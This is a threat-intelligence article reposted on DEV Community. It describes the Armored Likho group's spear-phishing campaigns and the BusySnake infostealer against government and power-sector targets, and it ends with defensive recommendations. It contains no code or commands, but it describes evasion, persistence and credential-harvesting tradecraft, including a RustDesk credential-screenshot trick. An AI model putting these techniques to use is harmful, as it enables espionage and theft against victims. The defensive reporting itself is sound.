DEV Community

Etairos.ai
Etairos.ai

Posted on • Originally published at threat-intelligence.redeyesecurity.com

Armored Likho Hits Government and Power Sector with BusySnake Stealer

TL;DR

  • what: Armored Likho is running spear-phishing campaigns that deploy the previously unreported Python-based BusySnake Stealer against government agencies and the electric power sector.
  • impact: Compromised hosts leak credentials, browser cookies, Telegram sessions, crypto wallets, keystrokes, and screenshots, with reverse SSH tunnels and RustDesk giving attackers persistent hands-on access.
  • fix: Apply Microsoft's November 2025 Patch Tuesday update for CVE-2025-9491 (ZDI-CAN-25373) and block execution of RAR-delivered EXE and LNK payloads.
  • who: Government, defense, and electric power organizations in Russia, Brazil, and Kazakhstan are the confirmed targets, with UAV-sector entities historically hit by the linked Eagle Werewolf cluster.

A previously undocumented actor tracked by Kaspersky as Armored Likho is running active intrusions against government agencies and the electric power sector in Russia, Brazil, and Kazakhstan. The group mixes cyber-espionage against organizations with financially motivated theft against individuals, and its core payload is a previously unreported Python-based infostealer called BusySnake.

The attack chain starts with spear-phishing email using lures tied to official government notices or social programs. Victims receive a RAR archive containing EXE droppers that pull additional payloads, including the stealer, from a GitHub repository. Alternate chains swap the EXE for a malicious Windows shortcut that weaponizes CVE-2025-9491 (ZDI-CAN-25373), a Windows LNK handling flaw Microsoft only patched in its November 2025 Patch Tuesday updates. Trend Micro reported last year that a dozen hacking groups have abused this same flaw since 2017.

How BusySnake operates

BusySnake runs as a background process with no console window, tagged by its PYW file extension. It decrypts its own bytecode only at the moment a function is called and re-encrypts immediately afterward, defeating both static analysis and memory dumping. Persistence is handled through a VBScript file that registers a scheduled task, with the malware checking for the task's existence and re-dropping it if missing.

Once it establishes contact with its C2 server, the stealer waits for instructions. Built-in capabilities include clipboard theft, full filesystem enumeration logged to a local database, document upload, and screenshot capture staged and archived locally before exfiltration.

On-demand modules give operators hands-on control

The real danger is what the C2 can command on demand. Operators can trigger interval screenshots, keystroke logging, and targeted collection of high-value data:

  • Cryptocurrency wallet files with JSON extensions
  • Telegram session and credential data
  • Firefox and Chromium browser cookies and saved passwords
  • Reverse SSH tunnels established through Go2Tunnel using a private key
  • RustDesk remote desktop installation for interactive access

⚠️ The RustDesk credential trap — If RustDesk is already present on the host, BusySnake launches it and prompts the victim to enter their credentials. It then screenshots the entered credentials and exfiltrates the image to the C2. This turns a legitimate remote-support tool into a live credential-harvesting front end.

Ties to Eagle Werewolf and UAV targeting

Kaspersky links Armored Likho to a cluster BI.ZONE tracks as Eagle Werewolf, active since May 2023 and known for hitting government and defense organizations involved in UAV development. In February 2026, Eagle Werewolf compromised a drone-focused Telegram channel to distribute AquilaRAT through a Rust dropper masquerading as a Starlink activation checklist. BusySnake and AquilaRAT share task-handling logic, scheduled-task persistence, and overlapping C2 endpoints.

An evolving, likely AI-assisted toolkit

A newer BusySnake build adds a task-management framework that assigns C2 commands operational statuses such as SCHEDULED, IN_PROGRESS, SUCCEEDED, and FAILED for cleaner reporting back to operators. Kaspersky also found signs that the first-stage loaders and stagers were generated with AI assistance, citing redundant comments and duplicated code blocks. The origins of Armored Likho remain unknown.

Defender actions — Patch CVE-2025-9491 immediately if you missed the November 2025 cycle. Block RAR archives carrying EXE or LNK payloads at the mail gateway, alert on VBScript-registered scheduled tasks and PYW execution, and monitor for unexpected RustDesk installs and outbound SSH tunnels to unknown hosts.

For critical infrastructure operators, the combination of espionage tooling and hands-on remote access is the concern here. This is not smash-and-grab. Armored Likho is built to sit quietly, decrypt only when needed, and pull tailored modules against whatever it finds on a power-sector or government host.


Originally published on RedEye Threat Intelligence.

Top comments (0)